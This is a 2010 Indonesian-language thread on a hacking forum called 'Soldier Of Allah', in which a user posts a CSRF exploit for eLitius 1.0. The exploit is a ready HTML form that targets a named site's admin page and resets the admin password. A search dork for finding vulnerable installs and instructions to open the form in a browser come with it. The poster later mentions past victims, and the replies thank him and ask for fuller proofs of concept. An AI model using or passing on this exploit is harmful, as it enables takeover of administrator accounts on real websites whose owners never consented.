Soldier Of Allah - Indonesia
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Soldier Of Allah adalah Team Pembela Islam
 
IndeksPortalLatest imagesPencarianPendaftaranLogin

 

 Sedikit mengenai CSRF attack

Go down 
+8
Gariz_Keraz
AccHill35
SyNTaX eRRoR
SOA.hugo
kurtz
CS-31
Neo|g4br1eL
cyberkalashnikov
12 posters
PengirimMessage
cyberkalashnikov

cyberkalashnikov


Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

Sedikit mengenai CSRF attack Empty
PostSubyek: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyThu Jan 07, 2010 9:37 pm

In the name of Allah

CSRF ==> Cross Site Requery Forgery

mungkin sedikit asing di dengar..
csrf merupakan salah satu exploit dalam web aplikasi yang bisa di gunakan untuk melakukan penetrasi kedalam web yang di jadikan target...
merupakan salah satu exploit favorit ana..
hhe..
karena simple n mudah...


cheers cheers

wew gimana caranya ntu...
ana ambil contoh bugs lama...
tapi gak tau masih bisa jalan atau gak..soalnya exploit ini udah jadul banget..
tapi ana tulis hanya untuk sekedar pengetahuan...
tidak ada kata basi dalam ilmu pengetahuan..

target kita..
http://www.hwb-services.co.uk

exploit = CSRF

dork = Powered by eLitius Version 1.0

ok..
kita ambil sample code html yang bisa di gunakan untuk bypassing admin login melalui csrf attack...

Code:
<title> Powered by eLitius Version 1.0 Change Password

<form action="http://www.hwb-services.co.uk/admin/manage-admin.php" method="post" name="adminForm">
<table class="admintable">
<tbody> <tr>
<td>
<table class="adminform" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<th colspan="2"> Change Password Of admin </th>
</tr>
<tr>


</tr>
<tr>
<td>Username:</td>
<td>
<input name="username" class="inputbox" size="40" value="admin" type="text" readonly="readonly" />
</td>
</tr> <tr>
<td> Password:</td>
<td>
<input class="inputbox" name="password" size="40" value="admin" type="text" />
</td>
</tr>
<tr>
<td> Email:</td>
<td> <input class="inputbox" name="email" size="40" value="cyber.kalashnikov@gmail.com" type="text" /> </td>
</tr>
<tr>
<td colspan="2"> 
</td>
</tr>

</tbody>
</table>
<input name="task" value="" type="hidden" />
<div style="margin-top:10px;"><input class="button" onclick="document.adminForm.task.value='edit'" type="submit" value="Save"> </div>
</td>
<td style="vertical-align: top; margin: 0; padding: 0;">
<table class="adminform" cellpadding="0" cellspacing="0">
<tr>
<th colspan="2">Dork: Powered by eLitius Version 1.0</th>
</tr>

<tr>
<center> <td style="font-weight: bold;"> CYBER.KALASHNIKOV</td> 7lt;/center>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
<input name="cid[]" value="1" type="hidden" />
<td>Download:http://www.elitius.com/</td>
</form>

</body>
</html>

sekarang copy kedalam notepad..
terus simpan dalam ekstensi html
terus eksekusi melalui web browser antum skalian...

semoga bermanfaat..

jazakallah khair
Kembali Ke Atas Go down
http://www.cyberkalashnikov.co.cc
Tamu
Tamu




Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyFri Jan 08, 2010 9:58 am

Syukron akhi

Jazakallah khairon
Kembali Ke Atas Go down
Neo|g4br1eL




Jumlah posting : 86
Join date : 07.01.10

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyFri Jan 08, 2010 4:32 pm

Mantaf bro,nice share Very Happy dlu klau g salah friendster jg ada bug bginian
Kembali Ke Atas Go down
CS-31

CS-31


Jumlah posting : 42
Join date : 05.01.10
Age : 33
Lokasi : Ngalam

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyFri Jan 08, 2010 11:38 pm

good share ijin mempelajari
Kembali Ke Atas Go down
http://sector31.co.cc
kurtz

kurtz


Jumlah posting : 16
Join date : 11.01.10
Age : 38
Lokasi : Jakarta

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyMon Jan 11, 2010 5:50 pm

POC secara lengkapy dun sob, mklum newbie baru denger CSRF Laughing
Kembali Ke Atas Go down
http://djomblo-community.co.cc
SOA.hugo

SOA.hugo


Jumlah posting : 36
Join date : 10.01.10
Age : 33
Lokasi : tangerang

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyMon Jan 11, 2010 8:49 pm

assalamualaikum..

iya akhi POC secara detailnya..
kalau bisa ada video tutornya..hehehe.. Razz Razz
Kembali Ke Atas Go down
http://shootercrew.blogspot.com
SyNTaX eRRoR

SyNTaX eRRoR


Jumlah posting : 28
Join date : 12.01.10

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyFri Jan 15, 2010 11:16 pm

ilmu lagi neh... mantab jaya dah
Kembali Ke Atas Go down
AccHill35




Jumlah posting : 15
Join date : 12.01.10
Age : 31
Lokasi : Palembang

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptySat Jan 16, 2010 12:11 am

Alhamdulillah, ilmu baru,

kalo ga salah,
Ini type attack yg memodifikasi script dari webpage ya akhi ?
Kembali Ke Atas Go down
Http://www.palembanghackerlink.com
Gariz_Keraz

Gariz_Keraz


Jumlah posting : 120
Join date : 12.01.10
Age : 29
Lokasi : Mojokerto

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptySat Jan 16, 2010 12:34 am

Syukron Akhi....

dapet ilmu baru....
Kembali Ke Atas Go down
http://www.afz-devils.co.cc
cyberkalashnikov

cyberkalashnikov


Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptySat Jan 16, 2010 4:55 am

SOA.hugo wrote:
assalamualaikum..

iya akhi POC secara detailnya..
kalau bisa ada video tutornya..hehehe.. Razz Razz

kalau poc dari video..
agak ribet..
soalnya ini exploit langka n jarang dapat..
hhe...

ana ada dapat beberapa kali korban...tapi lupa terus untuk di dokumentasikan dalam bentuk video..
afwan akhi
Kembali Ke Atas Go down
http://www.cyberkalashnikov.co.cc
cyberkalashnikov

cyberkalashnikov


Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptySat Jan 16, 2010 4:57 am

AccHill35 wrote:
Alhamdulillah, ilmu baru,

kalo ga salah,
Ini type attack yg memodifikasi script dari webpage ya akhi ?

kurang lebih begitu akhi...
trik ini bisa di pake untuk bypassing filterisasi melalui celah client side script...

Makanya dalam buku SIH dari om sto...
jangan pernah percaya dengan apa yang dikirimkan melalui client side...
affraid affraid
Kembali Ke Atas Go down
http://www.cyberkalashnikov.co.cc
T-roy

T-roy


Jumlah posting : 4
Join date : 03.05.10

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyMon May 03, 2010 6:15 am

asa'mekum anak bru ne.....
lam knl buat kk'?? Cool
Kembali Ke Atas Go down
Ghur4b4




Jumlah posting : 15
Join date : 23.06.10

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyFri Jun 25, 2010 1:51 am

bru coba tpi lo bisa.. mklum nubie..
bwt master2 skalian mohon ptnjuk n tutor lengkapnya dunk..

syukron Very Happy
Kembali Ke Atas Go down
El-Farhatz

El-Farhatz


Jumlah posting : 60
Join date : 20.03.10
Lokasi : Bumi Allah

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptySat Jun 26, 2010 3:42 am

wah manteb neh akhi ,,,,seep , coba coba dulu ah Very Happy
Kembali Ke Atas Go down
rascal_21

rascal_21


Jumlah posting : 68
Join date : 29.04.10
Age : 34
Lokasi : Cyber Jihad

Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack EmptyWed Jun 30, 2010 3:35 pm

izin plajari dolo..akhi Very Happy

Jazakallah khairon
Kembali Ke Atas Go down
http://albantani-crew.friendhood.net/
Sponsored content





Sedikit mengenai CSRF attack Empty
PostSubyek: Re: Sedikit mengenai CSRF attack   Sedikit mengenai CSRF attack Empty

Kembali Ke Atas Go down
 
Sedikit mengenai CSRF attack
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Sedikit shell n ftp account

Permissions in this forum:Anda tidak dapat menjawab topik
Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial-
Navigasi: